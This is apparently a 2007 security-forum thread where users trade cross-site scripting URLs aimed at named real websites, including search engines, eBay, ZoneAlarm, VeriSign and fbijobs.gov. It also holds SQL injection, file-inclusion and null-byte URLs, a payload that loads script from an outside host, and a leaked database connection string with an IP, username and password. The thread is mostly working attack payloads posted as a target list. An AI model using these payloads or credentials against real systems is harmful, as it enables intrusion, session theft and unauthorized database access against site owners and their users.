http://www.eztvefnet.org/index.php?sort=%27%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%31%29%3B%3C%2F%73%63%72%69%70%74%3E

A buch of search engines:

http://www.overture.com/d/search/?Keywords=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.ask.com/blogsearch?q=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E
http://www.hotbot.com/index.php?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.scrubtheweb.com/cgi-bin/search.cgi?q=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://images.ask.com/pictures?q=%22%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E
http://www.quintura.com/BookmarkPage.asp?request=%3C%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E%3E
http://web.info.com/infocom.us/search/web/%2522%253E%253Cscript%253Ealert(document.cookie)%253B%253C%252Fscript%253E
http://search.devx.com/search.cfm?q=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.accoona.com/search?qt=%250+%5C0%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E+%2F*
http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://hs.qsrch.com/dpark?Keywords=%3C/title%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C/script%3E
http://www.kanoodle.com/results.html?query=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.mapquest.com/maps/map.adp?cat=%3E%3E%3E%3E%3E%3Cscript%3Ealert(document.cookie)%3B%3C%2Fscript%3E
http://www.amnesi.com/index.php?domain_name=amnesi.com&q=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.findwhat.com/search_results.asp?mt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://linkcentre.com/dictionary/?word=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E
http://www.thenet1.com/search.php?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.links2go.com/LinksSearch?q=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.splatsearch.com/cgi-bin/splatsearch?searchstring=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E
http://www.searchhound.com/datingsearch.asp?zip=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E

Hah... you should have saved those for the month of search engine bugs!

- RSnake
Gotta love it. http://ha.ckers.org

Myeah coudn't wait ^^

http://wiki.whiteacid.org/UserSettings

Just fill "Your WikiName" with "><script>alert("XSS")</script> and press login :)

zonealarm.com

http://www.zonealarm.com/store/application?namespace=zls_catalog&origin=global.jsp&event=link.skuList&dc=12bms&ctry=US&lang=';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>&lid=dbtopnav_zaws&ovchn=GGL&ovcpn=AA_Zone+Alarm+ISS&ovcrn=sr2zl21go868go36pi31ai12+anti+phishing&ovtac=PPC&SR=sr2zl21go868go36pi31ai12

nemessis Wrote:
-------------------------------------------------------
> http://wiki.whiteacid.org/UserSettings
>
> Just fill "Your WikiName" with ">alert("XSS") and
> press login :)


*gasps*

Nice find. I really should have found that one considering I was the person to report the XSS of the same flaw in the above form on the same page. I've fixed it.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

I'm glad you fixed it :).

Next is:

http://www.ripe.net/cgi-bin/delcheck/delcheck2.cgi?zone=%22%3E%3Cscript%3Ealert%28%27Nemessis%27%29%3C%2Fscript%3E

http://challenges.whiteacid.org/1/ :)

Just fill the IP or port boxes with "><script>alert("XSS")</script> and press add to list :)

Hahaha. damn you! :)
That thing never took off and sucked hard. I'll just remove that site.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

ebay.com :) (I found that when I checked the ha.ckers.org headers :)) )

lapi.ebay.com/ws/eBayISAPI.dll?CAServer&Accepts=n&adType=1&bgColor=FEF0CE&bin=n&bodyFont=1&borderColor=F8B20C&catid=&charity=n&charityid=&content=1&encode=ISO-8859-1&few=&gallery=y&linkColor=003366&logo=n&maxprice=&minprice=&priceColor=990000&prvd=1&r0=1&sacategoryex=&sacategoryin=&sellerid=&sid=eBayAdContext897507&siteid=0&size=14&sort=0&sortby=endtime&sortdir=asc&srchdesc=n&ssPageName=eBay_ads&testFlash=y&textColor=333333&theme=0&titleandprice=n&track="><script>alert('Nemessis-www.rstzone.net')</script>



Edited 2 time(s). Last edit at 05/21/2007 07:32PM by nemessis.

http://www.scientology.org/html/en_US/istore/item/index.html?item=%22%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%27%58%53%53%27%29%3B%3C%2F%73%63%72%69%70%74%3E

#&

http://uk.trendmicro-europe.com/consumer/vinfo/encyclopedia.php?VName=%3C%2F%74%69%74%6C%65%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%22%23%26%22%29%3B%3C%2F%73%63%72%69%70%74%3E%0A

#&

WhiteAcid Wrote:
-------------------------------------------------------
> Hahaha. damn you! :)
> That thing never took off and sucked hard. I'll
> just remove that site.


and I was so looking forward to completing that secret server number challenge... i had my server all setup and ready to go... what am i supposed to do now?!

You couldn't do that one anyway, as the note right at the top of the page said the challenge was down. Didn't work.

Don't forget our IRC: irc://irc.irchighway.net/#slackers
-WhiteAcid - your friendly, very lazy, web developer

http://www.sitemeter.com/?a=stats&s=%22%3E%3C%73%63%72%69%70%74%3E%66%75%6E%63%74%69%6F%6E%20%7A%28%29%20%7B%20%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%22%58%53%53%22%29%3B%20%7D%20%77%69%6E%64%6F%77%2E%6F%6E%6C%6F%61%64%20%3D%20%7A%3B%20%3C%2F%73%63%72%69%70%74%3E%0A

#&

whoops.

http://sourceforge.net/search/?type_of_search=soft&words=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3B%3C%2Fscript%3E

http://www.splunk.com/base/sourcetype:%3Cimg%20src=23432%20onerror=%60alert('xss')%60%3E IE only

-tx @ lowtech-labs.org

Nice shopping cart, this is why I never use a credit card.

XSS style:

www.roadid.com/testimonials.asp?TID=77&back=/default.asp"></a><script>alert('who needs input validation anyways?');</script>

SQL style:

www.roadid.com/testimonials.asp?TID=3%20and%203=convert(int,(select%20top%201%20table_name%20from%20information_schema.tables))

JS email validation is evil...

http://searchsoftwarequality.techtarget.com/regPage1/1,296503,sid92,00.html?NextURL=http%3A%2F%2Fsearchsoftwarequality%2Etechtarget%2Ecom%2FaboutSearch%2F0%2C293871%2Csid92%2C00%2Ehtml&email=%22%3E%3Cscript%20src=//h4k.in/i.js%3E%3C/script%3E%40%2Es

Didn't even have to do anything, just stumbled upon this.

www.bestpracticepublications.com/Connections/bpp_db.asp

---------------snip

Dim MM_bpp_db_STRING
MM_bpp_db_STRING = "dsn=64.158.164.115;uid=lns;pwd=lns3892;"
'MM_bpp_db_STRING = "dsn=LNS;uid=lns;pwd=lns3892;"

'set con = Server.CreateObject("ADODB.Connection")
'con.connectionstring = MM_bpp_db_STRING
'con.Open
'response.end

https://knowledge.verisign.com/search/search.do?category=%22%3E%3Cscript%3Ealert(/Nemessis-www.rstzone.net/)%3C/script%3E#

You need to put the link in the address bar and click go and after the cookie is set put it again and click go

Any more from myspace?

Yea that would be the best

sunday Wrote:
-------------------------------------------------------
> http://www.scientology.org/html/en_US/istore/item/
> index.html?item=%22%3E%3C%73%63%72%69%70%74%3E%61%
> 6C%65%72%74%28%27%58%53%53%27%29%3B%3C%2F%73%63%72
> %69%70%74%3E

LOL tom cruise must go there

http://hattrick.org/Common/search.asp?searchWhat=team&searchType=BEGINS&teamName=%22%3E%3Cscript%3Ealert%28/Nemessis-www.rstzone.net/%29%3C%2Fscript%3E

two reflected post xsses in technorati:

http://coco.cd.chalmers.se/ola/poc/poctechnorati.html

just press submit

#&

http://www.whosarat.com/login.php fields not sanitized needs POST

Another nice shopping cart.

www.corstat.com/cart.php?target=category&category_id=SQL'%20OR%20'SQL

and another (looks like the same type of cart)

www.modestmouse.com/cart/cart.php?target=product&product_id=3&category_id=3'%20OR%20'1'='1

Edited to add:

RFI:
www.ecs.org/ecsmain.asp?page=http://www.ecs.org/ecsmain.asp

www.amphenol-industrial.com/index.asp?page=http://www.amphenol-industrial.com/index.asp

Null-Byte:
library.thinkquest.org/C0110189/cgi-bin/Load.cgi?Page=Load.cgi%00.shtml



Edited 3 time(s). Last edit at 05/25/2007 03:26PM by cougarhunter.

fbijobs.gov guys fixed their xss discussed previously in this thread http://sla.ckers.org/forum/read.php?3,44,5450
Now even if you just type 'script' word it will rudely inform you to 'Please provide a valid text for search.'
...but-but I just wanted to know if there's a script programmer position available at FBI!
then I typed 'scriPt' and it accepted it and comes up with leftnav.asp.bak in results which is not important since it doesn't exist anymore, but I got it's location - http://www.fbijobs.gov/include/ again, probably doesn't mean a thing, I'm completely unexperienced with asp so it may as well be a default dir.

so rebuilt xss :
[http://www.fbijobs.gov/searchresult.asp?SearchString=<ScRIpt language=javaScriPt>alert('XSS')</sCriPt>]